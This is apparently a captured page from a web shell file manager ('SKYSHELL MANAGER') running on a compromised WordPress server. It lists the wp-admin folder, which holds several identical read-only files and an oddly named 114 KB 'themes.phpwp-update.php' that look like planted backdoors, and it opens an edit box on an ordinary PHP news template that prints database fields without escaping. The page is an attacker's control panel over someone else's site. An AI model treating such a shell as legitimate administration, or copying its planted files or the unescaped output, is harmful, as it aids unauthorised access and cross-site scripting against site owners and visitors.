📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: world.php
<!DOCTYPE html> <html> <head> <link rel="icon" href="images/fav.png"/> <title>contentevergreen</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/animate.css"> <link rel="stylesheet" type="text/css" href="css/slick.css"> <link rel="stylesheet" type="text/css" href="css/theme.css"> <link rel="stylesheet" type="text/css" href="css/style.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!--<div id="preloader"> <div id="status"> </div> </div>--> <a class="scrollToTop" href="#"><i class="fa fa-angle-up"></i></a> <div class="container"> <header id="header"> <div class="row"> <div class="col-lg-3 col-md-12"> <div class="header_bottom"> <div class="header_bottom_left"><a class="logo" href="index.php"><img src="images/logo5.png" width="200px"></a></div> <!--div class="header_bottom_right"><a><img src="images/flag.png" alt="flag"></a></div --> </div> </div> <div class="col-lg-9 col-md-12"> <div id="navarea"> <nav role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav custom_nav"> <li class="active"><a href="index.php">Home</a></li> <li><a href="world.php">World</a></li> <li><a href="finance.php">Finance</a></li> <li><a href="market.php">Market</a></li> <li><a href="technology.php">Technology</a></li> <li><a href="trending.php">Trending</a></li> <li><a href="top_news.php">Top News</a></li> </ul> </div> </div> </nav> </div> </div> </div> </header> <hr style="background-color:#000000"><section id="mainContent"> <div class="content_bottom"> <div class="col-lg-8 col-md-8"> <div class="content_bottom_left"> <div class="single_category wow fadeInDown"> <h2> <span class="bold_line"><span></span></span> <span class="solid_line"></span> <a class="title_text">World News</a> </h2> <div class="business_category_left wow fadeInDown"> <ul class="fashion_catgnav"> <?php // Database connection details require 'db_connection.php'; // Fetch the latest 6 posts from the database in descending order of publication date $sql = "SELECT id, title, description, pst_img FROM post WHERE category='World News' ORDER BY id DESC LIMIT 4"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo '<li>'; echo '<div class="catgimg2_container">'; if (!empty($row["pst_img"])) { echo "<a class='catg1_img' href='blog_news.php?id=" . $row["id"] . "'><img class='res-img2' src='" . $row["pst_img"] . "' alt='" . $row["title"] . "'></a>"; } echo '</div>'; echo "<h2 class='catg_titile'><a href='blog_news.php?id=" . $row["id"] . "'>" . $row["title"] . "</a></h2>"; $shortDesc = substr($row["description"], 0, 100); echo "<p> <a href='blog_news.php?id=" . $row["id"] . "'> " . htmlspecialchars($shortDesc) . "... </a> </p>"; echo '</li>'; } } else { echo "0 results"; } ?> </ul> </div> <div class="business_category_right wow fadeInDown"> <ul class="small_catg"> <?php $sql = "SELECT id, title, description, pst_img FROM post WHERE category = 'World News' ORDER BY id DESC LIMIT 4, 8"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo '<li>'; echo '<div class="media wow fadeInDown">'; if (!empty($row["pst_img"])) { echo "<a class='media-left' href='blog_news.php?id=" . $row["id"] . "'><img class='res-img2' src='" . $row["pst_img"] . "' alt='" . $row["title"] . "'></a>"; } echo '<div class="media-body">'; echo "<h4 class='media-heading'><a href='blog_news.php?id=" . $row["id"] . "'>" . $row["title"] . "</a></h4>"; $shortDesc = substr($row["description"], 0, 100); echo "<p> <a href='blog_news.php?id=" . $row["id"] . "'> " . htmlspecialchars($shortDesc) . "... </a> </p>"; echo '</div>'; echo '</div>'; echo '</li>'; } } else { echo "0 results"; } ?> </ul> </div> </div> </div> </div> <div class="col-lg-4 col-md-4"> <div class="content_bottom_right"> <div class="single_bottom_rightbar"> <h2>Latest Stories </h2> <ul class="small_catg popular_catg wow fadeInDown"> <?php // Database connection details require 'db_connection.php'; $sql = "SELECT id, title, description, pst_img FROM post WHERE category = 'Top News' ORDER BY id DESC LIMIT 2, 3"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo '<li>'; echo '<div class="media wow fadeInDown">'; if (!empty($row["pst_img"])) { echo "<a class='media-left' href='blog_news.php?id=" . $row["id"] . "'><img class='res-img2' src='" . $row["pst_img"] . "' alt='" . $row["title"] . "'></a>"; } echo '<div class="media-body">'; echo "<h4 class='media-heading'><a href='blog_news.php?id=" . $row["id"] . "'>" . $row["title"] . "</a></h4>"; $shortDesc = substr($row["description"], 0, 100); echo "<p> <a href='blog_news.php?id=" . $row["id"] . "'> " . htmlspecialchars($shortDesc) . "... </a> </p>"; echo '</div>'; echo '</div>'; echo '</li>'; } } else { echo "0 results"; } ?> </ul> </div> <div class="single_bottom_rightbar"> <ul role="tablist" class="nav nav-tabs custom-tabs"> <li class="active" role="presentation"><a data-toggle="tab" role="tab" aria-controls="home" href="#mostPopular">Most Popular</a></li> <!--<li role="presentation"><a data-toggle="tab" role="tab" aria-controls="messages" href="#recentComent">Recent News</a></li>--> </ul> <div class="tab-content"> <div id="mostPopular" class="tab-pane fade in active" role="tabpanel"> <ul class="small_catg popular_catg wow fadeInDown"> <?php $sql = "SELECT id, title, description, pst_img FROM post WHERE category = 'Top News' ORDER BY id DESC LIMIT 5, 6"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo '<li>'; echo '<div class="media wow fadeInDown">'; if (!empty($row["pst_img"])) { echo "<a class='media-left' href='blog_news.php?id=" . $row["id"] . "'><img class='res-img2' src='" . $row["pst_img"] . "' alt='" . $row["title"] . "'></a>"; } echo '<div class="media-body">'; echo "<h4 class='media-heading'><a href='blog_news.php?id=" . $row["id"] . "'>" . $row["title"] . "</a></h4>"; $shortDesc = substr($row["description"], 0, 100); echo "<p> <a href='blog_news.php?id=" . $row["id"] . "'> " . htmlspecialchars($shortDesc) . "... </a> </p>"; echo '</div>'; echo '</div>'; echo '</li>'; } } else { echo "0 results"; } ?> </ul> </div> </div> </div> </div> </div> </div> </section> <?php // Close the database connection $conn->close(); ?> </div> <footer id="footer"> <div class="footer_bottom"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="center"> <p>Copyright © 2025 Content Evergreen. All rights reserverd. <a href="privacy.php" style="color:#fff"> || Privacy Policy</a><a href="terms.php" style="color:#fff"> || Terms & Conditions</a><a href="contact.php" style="color:#fff"> || Help</a></p> </div> </div> </div> </div> </div> </footer> <script src="js/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/wow.min.js"></script> <script src="js/slick.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save